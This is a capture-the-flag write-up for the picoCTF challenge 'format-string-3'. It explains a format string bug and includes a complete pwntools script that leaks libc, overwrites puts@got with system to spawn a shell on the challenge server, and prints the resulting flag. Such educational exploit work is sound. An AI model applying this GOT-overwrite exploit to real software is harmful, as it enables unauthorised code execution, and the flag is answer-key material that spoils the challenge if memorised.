Write-up author: jon-brandy
This program doesn't contain a win function. How can you win? Download the binary here. Download the source here. Download libc here, download the interpreter here. Run the binary with these two files present in the same directory.
Additional details will be available after launching your challenge instance.
Is there any way to change what a function points to?
- In this challenge we're given both the source code and the binary.
- The binary is 64 bit LSB, dynamically linked, and not stripped.
BINARY PROTECTIONS
- Upon reviewing the source code, the challenge is very straightforward.
- The binary is Partial RELRO and there's a printf() usage which missing it's format specifier, hence introducing FSB (Format String Bug).
- At next LOC, a puts() called and
/bin/shstring used as the argument. - Our objective is to overwrite
puts@gotwithlibc.sym.system. It shall gets us a shell -->system("/bin/sh"). - Now let's identify which
function@gotcan be overwritten.
IN GDB
- Nice!
puts@gotcan be overwritten. - Now let's find the offset.
RESULT
- To overwrite the GOT, I used
fmtstr_payload, here's the full script:
FULL SCRIPT
from pwn import *
exe = './format-string-3'
elf = context.binary = ELF(exe, checksec=True)
context.log_level = 'INFO'
library = './libc.so.6'
libc = context.binary = ELF(library, checksec=False)
# sh = process(exe)
sh = remote('rhea.picoctf.net', 58943)
sh.recvuntil(b'libc: ')
get = sh.recvline().strip()
get = eval(get)
info(f'LIBC LEAK --> {hex(get)}')
libc.address = get - libc.sym['setvbuf']
info(f'LIBC BASE --> {hex(libc.address)}')
payload = fmtstr_payload(38, {elf.got['puts']:libc.sym['system']})
sh.sendline(payload)
sh.interactive()RESULT
- We got the flag!
picoCTF{G07_G07?_cf6cb591}